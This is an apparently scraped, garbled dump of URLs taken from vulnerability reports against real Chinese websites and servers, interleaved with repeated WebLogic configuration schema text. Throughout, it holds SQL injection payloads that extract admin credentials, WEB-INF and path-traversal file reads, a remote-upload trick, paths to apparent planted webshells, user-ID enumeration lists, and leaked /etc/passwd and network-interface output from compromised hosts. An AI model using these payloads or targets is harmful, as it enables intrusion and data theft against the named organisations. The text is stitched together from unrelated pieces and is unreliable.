
sec:authentication-provider xsi:type="wls:default-identity-asserterType sec:active-type sec:active-type sec:authentication-provider sec:role-mapper xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml xsi:type="xac:xacml-role-mapperType sec:role-mapper sec:authorizer xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml xsi:type="xac:xacml-authorizerType sec:authorizer sec:adjudicator xsi:type="wls:default-adjudicatorType sec:adjudicator sec:credential-mapper xsi:type="wls:default-credential-mapperType sec:credential-mapper sec:cert-path-provider xsi:type="wls:web-logic-cert-path-providerType sec:cert-path-provider sec:cert-path-builder sec:cert-path-builder sec:name sec:name sec:password-validator xmlns:pas="http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator xsi:type="pas:system-password-validatorType sec:name sec:name pas:min-password-length pas:min-password-length pas:min-numeric-or-special-characters pas:min-numeric-or-special-characters sec:password-validator http://**.**.**.**//index.aspx?JiGouBianHao=430100 http://218.249.118.229:7001/ http://**.**.**.**:89/login.do https://**.**.**.**/por/login_psw.csp http://**.**.**.**/zfnews.asp?id=2 http://**.**.**.**/zfnews.asp?id=2%20union%20select%201,2,username,4,password%20from%20admin http://**.**.**.**/Database/ http://221.8.57.106:7006/ http://221.8.57.106:7009/ http://221.8.57.106:7006/uddiexplorer/sss.jsp http://221.8.57.106:7006/uddiexplorer/out.jsp http://10.0.7.79 http://10.0.7.69 http://10.0.7.104 http://10.0.7.42 http://10.0.7.39 http://10.0.7.28 http://10.0.7.114 http://10.0.7.76 http://10.0.7.107 http://10.0.7.46 http://10.0.7.45 http://10.0.7.30 http://10.0.7.49 http://10.0.7.37 http://10.0.7.115 http://10.0.7.237 http://10.0.7.236 http://10.0.7.251 http://10.0.7.250 http://10.0.7.212 http://10.0.7.183 http://**.**.**.**/Main.aspx# http://**.**.**.**/webmanage/login.aspx http://**.**.**.**/Login.aspx http://**.**.**.**/webmanage/web_manage.asp http://**.**.**.**/Login.aspx 
http://oa.sy-yy.com:8989/yyoa/checkWaitdo.jsp?userID=1 http://**.**.**.**/weblogic/domain xmlns:sec="http://**.**.**.**/weblogic/security xmlns:wls="http://**.**.**.**/weblogic/security/wls xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xsi:schemaLocation="http://**.**.**.**/weblogic/security/xacml http://**.**.**.**/weblogic/security/xacml/1.0/xacml.xsd http://**.**.**.**/weblogic/security/providers/passwordvalidator http://**.**.**.**/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd http://**.**.**.**/weblogic/domain http://**.**.**.**/weblogic/1.0/domain.xsd http://**.**.**.**/weblogic/security http://**.**.**.**/weblogic/1.0/security.xsd http://**.**.**.**/weblogic/security/wls http://**.**.**.**/weblogic/security/wls/1.0/wls.xsd sec:authentication-provider xsi:type="wls:default-authenticatorType sec:authentication-provider sec:authentication-provider xsi:type="wls:default-identity-asserterType sec:active-type sec:active-type sec:authentication-provider sec:role-mapper xmlns:xac="http://**.**.**.**/weblogic/security/xacml xsi:type="xac:xacml-role-mapperType sec:role-mapper sec:authorizer xmlns:xac="http://**.**.**.**/weblogic/security/xacml xsi:type="xac:xacml-authorizerType sec:authorizer sec:adjudicator xsi:type="wls:default-adjudicatorType sec:adjudicator sec:credential-mapper xsi:type="wls:default-credential-mapperType sec:credential-mapper sec:cert-path-provider xsi:type="wls:web-logic-cert-path-providerType sec:cert-path-provider sec:cert-path-builder sec:cert-path-builder sec:name sec:name sec:password-validator xmlns:pas="http://**.**.**.**/weblogic/security/providers/passwordvalidator xsi:type="pas:system-password-validatorType sec:name sec:name pas:min-password-length pas:min-password-length pas:min-numeric-or-special-characters pas:min-numeric-or-special-characters sec:password-validator http://58.52.163.234:7001/ da1e:40c2:10cb:37c2:3f57:ffec]:7001 ed89:9ec8:ea98%12]:7001 
http://ye.ysh365.com/index.php/manage/Appraise/Admin http://222.73.173.5:7001/ http://60.28.104.133:9060/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://**.**.**.**/loginAction.do?actionType=login&condition.action=homepage&jsessionid=存在命令执行漏洞 http://www.xiangyahui.com/mobile_user_userinfo?userid=3000 http://27.223.70.33:7003/rrs/security/loginInit.action http://xmlns.oracle.com/weblogic/domain xmlns:sec="http://xmlns.oracle.com/weblogic/security xmlns:wls="http://xmlns.oracle.com/weblogic/security/wls xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://xmlns.oracle.com/weblogic/security/xacml http://xmlns.oracle.com/weblogic/security/xacml/1.0/xacml.xsd http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd http://xmlns.oracle.com/weblogic/domain http://xmlns.oracle.com/weblogic/1.0/domain.xsd http://xmlns.oracle.com/weblogic/security http://xmlns.oracle.com/weblogic/1.0/security.xsd http://xmlns.oracle.com/weblogic/security/wls http://xmlns.oracle.com/weblogic/security/wls/1.0/wls.xsd sec:authentication-provider xsi:type="wls:default-authenticatorType sec:authentication-provider sec:authentication-provider xsi:type="wls:default-identity-asserterType sec:active-type sec:active-type sec:authentication-provider sec:role-mapper xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml xsi:type="xac:xacml-role-mapperType sec:role-mapper sec:authorizer xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml xsi:type="xac:xacml-authorizerType sec:authorizer sec:adjudicator xsi:type="wls:default-adjudicatorType sec:adjudicator sec:credential-mapper xsi:type="wls:default-credential-mapperType sec:credential-mapper sec:cert-path-provider xsi:type="wls:web-logic-cert-path-providerType sec:cert-path-provider sec:cert-path-builder sec:cert-path-builder sec:name sec:name sec:password-validator 
xmlns:pas="http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator xsi:type="pas:system-password-validatorType sec:name sec:name pas:min-password-length pas:min-password-length pas:min-numeric-or-special-characters pas:min-numeric-or-special-characters sec:password-validator http://**.**.**.**/App_Web/W_AdvancedSearch_Individual.aspx http://**.**.**.**/wj/Page/Wap/ActInduce.aspx?activtycode=123 http://**.**.**.**/live/zh/content.php?section_id=6 http://**.**.**.**/news_detail.php?id=79 http://x.youxinpai.com/login/?return=s http://123.127.246.34/index.php?g=Wap&m=Dining&a=ShowDetail&id=2 http://weixintest.newchinalife.com/uploads/a/admin/8/7/b/2/56712d732270b.php url:http://book.fwxgx.com/orders/5803 http://**.**.**.**/ldims/login.jsp http://**.**.**.**/ldims/webtopo/sqlnet.log http://baike.baidu.com/crossdomain.xml http://dk.360che.com/viewthread.php?tid=946240#bbsindex_new http://**.**.**.**/PriceList.aspx?y=2015&m=9&c=1300060000 http://ir.vodone.com/c/ir_annouce.php?year=2015 http://ir.vodone.com/s/ir_annouce.php?year=2015 http://ir.vodone.com/html/ir_annouce.php?year=2015 http://**.**.**.**/charter/subpage06_d.php?id=210 http://**.**.**.**/en/Event_WhatsNew_Details.php?id=3 http://**.**.**.**/classtypesdetail.php?course=1500&mid=8&msid=48 http://**.**.**.**/m/event/applier http://**.**.**.**/bugs/wooyun-2010-0152457 https://renzheng.glodon.com/app/exam/login/Login/login.do http://jn.glodon.com/admin/ http://file3.glodon.com/ http://comment.yaolan.com/zhuanti/MessageBoard.aspx?Topic=abc_dvd&Color= http://**.**.**.**/c/mgt_news_details.php?itemid=466&page=1 sboss.ear/webapp.war http://**.**.**.** http://www.sppm.tsinghua.edu.cn/articles/upload.jsp处可以上传文件 http://**.**.**.**/m/search.aspx http://www.panda.tv/crossdomain.xml http://www.panda.tv/watchhistory获取历史记录 http://**.**.**.**/thirdparty/ueditor/jsp/getRemoteImage.jsp?upfile=http://**.**.**.**/sex.jsp%23.jpg http://118.144.75.72/platform/ueditor/jsp/getRemoteImage.jsp?upfile 
http://wooyun.org/bugs/wooyun-2015-0129588 http://**.**.**.**/ jdbc:oracle:thin:@**.**.**.**:1521:wwcx http://**.**.**.**/ui/indexlis.jsp jdbc:oracle:thin:@**.**.**.**:1521/xzt http://www.cnblogs.com/bundles/blog-common.js?v=vfyaOatuLMyj5RwdSGYAF5dymrCScyt2dbQ1pH4gldc1 http://e.zznissan.com.cn/event/20130909/news/artical.php?sortid=4&arcid=31 http://e.zznissan.com.cn/admin/console/?c=login&a=log http://**.**.**.**/OuterNetWeb/appMain?service=index&func=aIndex http://**.**.**.**/servicehall/ http://**.**.**.**/wa/wa/ma3.jsp http://**.**.**.** http://**.**.**.** http://www.scu.edu.cn/WEB-INF/web.xml http://www.scu.edu.cn/WEB-INF/applicationContext.xml http://www.scu.edu.cn//WEB-INF%2fweb.xml http://**.**.**.** http://**.**.**.**/8thManage/index.jsp http://121.8.157.211 http://121.8.157.211/wa/wa/ma3.jsp http://vip.crocs.cn http://**.**.**.**/login.php http://mgdz.ljlj.cc/account/login.php http://zabbix.glodon.com/index.php http://103.47.87.72:7001/console/login/LoginForm.jsp root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC 
User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin admin:x:500:500::/home/admin:/bin/bash oracle:x:501:501::/home/oracle:/bin/bash encap:Ethernet AE:8B:41:F6:AD addr:190.7.10.18 Bcast:190.7.255.255 Mask:255.255.0.0 fe41:f6ad/64 Scope:Link MTU:1500 packets:445141104 packets:456627675 txqueuelen:1000 http://**.**.**.**/manage/login.aspx http://**.**.**.**/sc/ir_announce.php?year=2014 http://**.**.**.**/tc/ir_announce.php?year=2014 http://**.**.**.**/html/ir_announce.php?year=2014 http://www.idtsec.com/ http://www.zkbh.com.cn/ http://www.zkbh.com.cn/search.asp http://**.**.**/netSales/pagesCar/SimpleCarEdit.do http://**.**.**/netSales/one8.jsp http://106.37.195.143/clppay/jsp/homecon.jspx shell:http://106.37.195.143/clppay/jsp/homecon.jspx google:intitle:企业代理服务器--中国移动 http://**.**.**.**/%c0%ae/WEB-INF/monitor.xml http://124.127.187.4:8080/qcar/(ip与之前提的不一样) http://manager.crvole.com.cn/index.php?r=site/login http://124.251.36.95/TCL http://182.254.162.32:7001/console/login/LoginForm.jsp root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin 
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin rtkit:x:498:499:RealtimeKit:/proc:/sbin/nologin pulse:x:497:498:PulseAudio Daemon:/var/run/pulse:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin oracle:x:500:500::/home/oracle:/bin/bash weblogic:x:501:503::/data/weblogic:/bin/bash hssale:x:505:500::/data/hssale:/bin/bash tuxedo:x:504:500::/data/tuxedo:/bin/bash encap:Ethernet addr:10.232.6.108 Bcast:10.232.7.255 Mask:255.255.254.0 MTU:1500 packets:202837563 packets:27915347 txqueuelen:1000 http://www.minmindai.com/Franchise/index/city_s_id/22*.html URL:http://life.ufh.com.cn/guidelist.php?g_id=10 http://life.ufh.com.cn/guidelist.php?g_id=10 http://**.**.**.** http://**.**.**.**/coremail/login.jsp可以愉快的去爆破了 https://m.sinochem.com http://**.**.**.**/ http://qinggan.baihe.com/ask/detail/11.html http://**.**.**.**//manager/html http://**.**.**.**/doctor/dept.aspx?dept=23 e832:526d:205f%12 jdbc:jtds:sqlserver**.**.**.**:51433;DatabaseName=twdb jdbc:oracle:thin:@**.**.**.**:1521:SUNCN jdbc:oracle:thin:@**.**.**.**:1521:testpro jdbc:dm**.**.**.**:12345/frontpc http://**.**.**.** jdbc:oracle:thin:@**.**.**.**:1521:ahsxtest jdbc:oracle:thin:@**.**.**.**:1521:AHXDJTOA jdbc:oracle:thin:@**.**.**.**:1521:devmain http://**.**.**.**/pharmacy/ContentAspx/ViewCotent.aspx?pk=15062300001&isClass=10&setTable=2 http://fanmei.zhuzher.com:80/ http://cbs.zhuzher.com:15018/ com:15018 http://218.193.160.77/WEB-INF/web.xml 
http://218.193.160.77/WEB-INF/classes/jdbc.properties http://218.193.160.77/WEB-INF/classes/hibernate.cfg.xml http://redmine.shisu.edu.cn/.svn/entries encap:Ethernet AE:8B:41:F6:AD addr:190.7.10.18 Bcast:190.7.255.255 Mask:255.255.0.0 fe41:f6ad/64 Scope:Link MTU:1500 packets:445141104 packets:456627675 txqueuelen:1000 xxx:7002 http://**.**.**.**/?m=content&c=index&a=download&cat_id=26&menu_id=24 http://223.223.197.242:8080/console http://www.xintai.com/collect/receiver.do http://**.**.**.**/sldj/201304/t20130415_1420.html http://**.**.**.**/jsp/login/relogin.jsp http://**.**.**.**/jsp/login/relogin.jsp http://**.**.**/account/login_ http://**.**.**/account/login_ http://**.**.**/account/login_ http://cbs.zhuzher.com:15018/ com:15018 http://124.127.49.183:8099/gms-v2/ http://124.127.49.183:8099/ http://www.outao.eu:81/ http://www.softresource.cn/uams/api/manager/login http://m.jiashuangkuaizi.com/.svn/entries https://**.**.**/debug/_ http://beta.m.jiashuangkuaizi.com/Operation/login http://rzrq.263.net http://rzrq.263.net:7001/ http://ask.huatu.com/ http://agency.1jiajie.com http://**.**.**.**/seeyon/ http://**.**.**.**/seeyon/management/index.jsp http://**.**.**.**/seeyon/logs/login.log http://bbs.feidee.com/forum.php https://m.shengri.cn/user/login http://**.**.**.**/wssw/jsp/zhcx/ssxxcx/nsrzg_001.jsp http://sq.mengniu.com.cn/File/ http://b2b.emaotai.cn http://gksx.free.ezvpn.cn:8080/yyoa/ http://gksx.free.ezvpn.cn:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@datadir http://mall.lakala.com/orders/vieworder?ot=1433293292418&orderId=20150603303235 mall.lakala.com/purchases/cancelorder?orderId=20140301195050 http://mall.lakala.com/orders/vieworder?ot=1393892046389&orderId=20140301195050 http://**.**.**.** http://**.**.**.**/articleview.php?id=1396 http://oa.app.minshenglife.com:89/m1/login.do http://hsj.umpay.com/Conf/ http://**.**.**.**:18080/ http://mis.hongfa.cn https://124.160.68.233 http://wear.fh21.com.cn http://ec.ecaic.com/ec/ 
http://ec.ecaic.com/ec/login.do?action=download&fileUrl=%2FWEB-INF/&fileName=web.xml http://www.ecaic.com:8070/cardactive/fileDownLoadAction.do?action=download&fileUrl=/WEB-INF/&fileName=web.xml http://www.ecaic.com:8070/cardactive/fileDownLoadAction.do?action=download&fileUrl=%2Fjsp%2F&fileName=default.jsp http://**.**.**.**/ http://oa.gkzj.com/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://oa.gkzj.com/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2%27%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version%28%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29--%20- http://www.ttkdex.com.hk/Page/Logistics/InspectMessage.aspx?StorageNumber= https://meican.com/settings http://oa.caitc.cn/ http://www.cnpicl.com.cn:8080/yyoa/ http://www.cnpicl.com.cn:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://www.cnpicl.com.cn:8080/yyoa/common/SelectPerson/reloadData.jsp http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=chenjun http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=chenwei http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=hechao http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=hefeng http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=huangwei http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=hujing http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liangchao http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=lihaiying http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=lilei http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=limingming http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liuqiang http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liurui http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liushuai http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liuyang http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liuyong http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liuyuan 
http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liwei http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=lixia http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liyuanyuan http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=wanghaiyan http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=wangli http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=wangna http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=wangxiaodan http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=wangxiaoming http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=wangzhiqiang http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=wuying http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=xuying http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=yangping http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhangchunmei http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhanghang http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhangminghua http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhangshuo http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhangwei http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhangwenhua http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhangyan http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhaogang http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhaojun http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhouxin http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhupeng http://wiki.jiashuangkuaizi.com http://27.223.70.113:7003/mainFrame.html http://xmlns.oracle.com/weblogic/domain xmlns:sec="http://xmlns.oracle.com/weblogic/security xmlns:wls="http://xmlns.oracle.com/weblogic/security/wls xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://xmlns.oracle.com/weblogic/security/xacml http://xmlns.oracle.com/weblogic/security/xacml/1.0/xacml.xsd http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd 
http://xmlns.oracle.com/weblogic/domain http://xmlns.oracle.com/weblogic/1.0/domain.xsd http://xmlns.oracle.com/weblogic/security http://xmlns.oracle.com/weblogic/1.0/security.xsd http://xmlns.oracle.com/weblogic/security/wls http://xmlns.oracle.com/weblogic/security/wls/1.0/wls.xsd sec:authentication-provider xsi:type="wls:default-authenticatorType sec:authentication-provider sec:authentication-provider xsi:type="wls:default-identity-asserterType sec:active-type sec:active-type sec:authentication-provider sec:role-mapper xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml xsi:type="xac:xacml-role-mapperType sec:role-mapper sec:authorizer xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml xsi:type="xac:xacml-authorizerType sec:authorizer sec:adjudicator xsi:type="wls:default-adjudicatorType sec:adjudicator sec:credential-mapper xsi:type="wls:default-credential-mapperType sec:credential-mapper sec:cert-path-provider xsi:type="wls:web-logic-cert-path-providerType sec:cert-path-provider sec:cert-path-builder sec:cert-path-builder sec:name sec:name sec:password-validator xmlns:pas="http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator xsi:type="pas:system-password-validatorType sec:name sec:name pas:min-password-length pas:min-password-length pas:min-numeric-or-special-characters pas:min-numeric-or-special-characters sec:password-validator XX:PermSize=512m XX:MaxPermSize=1024m XX:PermSize=512m XX:MaxPermSize=1024m http://180.168.145.154:7001/Chinalife/main/Login.html http://180.168.145.154:7001/uddiexplorer/sss.jsp http://180.168.145.154:7001/uddiexplorer/out.jsp http://video.qingdaonews.com/cms/frame/login.jsp http://**.**.**.**:8080/bocoit/common.asp?id=4182&sid=7 www.boco.com.cn:8080 http://m.bee.baidu.com/ http://m.bee.baidu.com/index.php?r=mobile%2Fcost%2Fupdate&id=XXXX http://m.bee.baidu.com/index.php?r=mobile%2Fcost%2Fdelete&id=XXXX http://m.bee.baidu.com/index.php?r=mobile%2Fpoint-poi%2Fupdate&id=XXXX 
http://m.bee.baidu.com/index.php?r=mobile%2Fpoint-poi%2Fdelet&id=XXXX http://open.dealer.auto.sohu.com/api/dealerForDbModelPage?modelId=4835&cityCode=510100&_=1450903117507&callback=Data.parse4S http://www.netentsec.com/index.php?m=member&c=index&a=login http://**.**.**.**河南省国税局移动办税平台站点存在weblogic的反序列化 https://r2mp.huawei.com/r2mp/ https://r2mp.huawei.com/wa/wa/pwn.jsp https://r2mp.huawei.com/wa/wa/ma3.jsp http://yyyl.swu.edu.cn/ http://**.**.**.**/ http://**.**.**.**/web/web/web/index http://**.**.**.**/ http://**.**.**.**/asp/info.asp?topic=NW&classifyid=&csfilter=&dtfilter=articleinfoweb.infovalue@%273%27&page=&from= http://www.hi0452.com/pay/order.php http://**.**.**.**/bugs/wooyun-2015-0139829 http://**.**.**.**:7001/etrading/etrading.jsp http://**.**.**.**/bugs/wooyun-2015-0143477 http://**.**.**.**/listDetail.asp?c_no=00229 http://www.kela.cn/index.php?m=admin&c=account&a=index http://**.**.**.**/bugs/wooyun-2015-0143515 http://www.grhao.com/index.htm http://game.weibo.com/avatar/interface/shareAvatar http://game.weibo.com/avatar/interface/shareAvatar http://app.wcdn.cn.zhchbin.xyz/ http://**.**.**.**/bugs/wooyun-2015-0140859 http://123.126.34.67:7001/ http://123.126.34.67:7003/ http://123.126.34.67:7001/uddiexplorer/sss.jsp http://xxx.xxx.xxx.xxx:7002/ index.php/index/index.html http://www5.nenu.edu.cn/professor/pro/yul/c_kygz.php?id=319 url:http://211.152.53.60:8080/websource/docroot/FD/fdlogin.jsp http://**.**.**.**/eoffice_web/index.php?s=/admin/settings/register.html http://**.**.**.**/eoffice_web/index.php?s=/admin/update/update_list.html http://**.**.**.**/index.php/webgame/index/cid/* http://**.**.**.**/ http://**.**.**.**/login.do http://eagle.tcl.com/Upfile_Article.asp jdbc:oracle:thin:@10.1.60.80:1521:orcl ldap://192.168.165.62:389 http://**.**.**.**/OrderDetail.aspx?sid=1614100&hotelcode=PEKABP http://**.**.**.**/OrderDetail.aspx?sid=1614101&hotelcode=PEKABP http://**.**.**.**/OrderDetail.aspx?sid=1614102&hotelcode=PEKABP 
http://**.**.**.**/OrderDetail.aspx?sid=1614103&hotelcode=PEKABP http://**.**.**.**/OrderDetail.aspx?sid=1614104&hotelcode=PEKABP http://**.**.**.**/OrderDetail.aspx?sid=1614105&hotelcode=PEKABP http://**.**.**.**/OrderDetail.aspx?sid=1614173&hotelcode=PEKABP http://**.**.**.**/OrderDetail.aspx?sid=1614311&hotelcode=PEKABP http://**.**.**.**/OrderDetail.aspx?sid=1614312&hotelcode=PEKABP http://**.**.**.**/OrderDetail.aspx?sid=1614313&hotelcode=PEKABP http://oa.tianjimedia.com//yyoa/assess/js/initDataAssess.jsp http://www.abc360.com/ThinkPHP/Library/Vendor.tar.gz http://182.92.119.216:5678/ http://www.abc360.com//wage/Log/lastSql.txt http://**.**.**.** http://ouing.cn/manage/login.asp http://ouing.cn/manage/myfck/editor/filemanager/browser/default/browser.html?Connector=../../connectors/asp/connector.asp http://www.etraveller.cn/news_v.asp?id=838 http://**.**.**.**/portal/web/main/index.action https://**.**.**.** http://**.**.**.**:8084/ylnsyhmis/manage/user-manage!login.action http://**.**.**.**:8084/ylnsyhmis/bak.jsp http://60.8.88.179:6666/seeyon/main.do http://218.106.130.43/sso/logon http://58.254.214.136/ http://58.254.214.132/ http://online.greatlife.cn:8001/greatlife/login.do http://**.**.**.**/new.asp?id=1603 http://58.254.214.131/ http://zf.chinapost.com.cn http://newmail.19lou.com/,果然,你们的邮箱已经换了 http://newmail.19lou.com/include/userlist.txt,所有的用户列表 https://owa.tcl.com/ http://114.212.191.46/ http://inquiry.chinalifepension.com:7001/netcust/IndexAction.do?action=psnLogin root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbinlogin daemon:x:2:2:daemon:/sbin:/sbinlogin adm:x:3:4:adm:ar/adm:/sbinlogin sync:x:5:0:sync:/sbin:/bin/sync mail:x:8:12:mail:ar/spool/mail:/sbinlogin ftp:x:14:50:FTP User:ar/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbinlogin nscd:x:28:28:NSCD Daemon:/:/sbinlogin vcsa:x:69:69:virtual owner:/dev:/sbinlogin ntp:x:38:38::/etc/ntp:/sbinlogin pcap:x:77:77::ar/arpwatch:/sbinlogin dbus:x:81:81:System bus:/:/sbinlogin avahi:x:70:70:Avahi 
daemon:/:/sbinlogin rpc:x:32:32:Portmapper user:/:/sbinlogin mailnull:x:47:47::ar/spool/mqueue:/sbinlogin smmsp:x:51:51::ar/spool/mqueue:/sbinlogin apache:x:48:48:Apache:ar/www:/sbinlogin sshd:x:74:74:Privilege-separated SSH:ar/empty/sshd:/sbinlogin rpcuser:x:29:29:RPC User:arb/nfs:/sbinlogin nfsnobody:x:4294967294:4294967294:Anonymous User:arb/nfs:/sbinlogin xfs:x:43:43:X Server:/etc/X11/fs:/sbinlogin haldaemon:x:68:68:HAL daemon:/:/sbinlogin avahi-autoipd:x:100:101:avahi-autoipd:arb/avahi-autoipd:/sbinlogin gdm:x:42:42::ar/gdm:/sbinlogin sabayon:x:86:86:Sabayon user:/homebayon:/sbinlogin oracle:x:500:500::/export/home/oracle:/bin/bash probe:x:501:100::/export/home/probe:/bin/bash dninms:x:502:100::/export/home/dninms:/bin/bash admin:x:503:501::/export/home/admin:/bin/bash cas:x:504:100::/export/home/cas:/bin/bash zzzxj:x:505:100::/export/home/zzzxj:/bin/bash http://219.143.162.220:7001/ui/ http://www.befun.me/index.php http://qa.tank.duowan.com/manage/.svn/entries http://qa.tank.duowan.com/manage/sql/dbcfg.py http://202.104.30.81/ http://114.251.203.85:7001/huatai/agent/login.do;jsessionid=0Qx8W7LTHQpN1K9pyp55fSYLrRN5KG4L482m1dmmJtqBt7mwCyZj!1058723258?authenticationEntry=true URL:http://www1.southernfund.com:443/nfjjRecruitSystem/toregister.action确定是否存在struts2开启debug可执行任意代码 http://1.202.242.119:7001/huatai4bank/agent/login.do?authenticationEntry=true http://101.251.192.28:8080 http://**.**.**.** http://rdcrm.midea.com.cn:9082 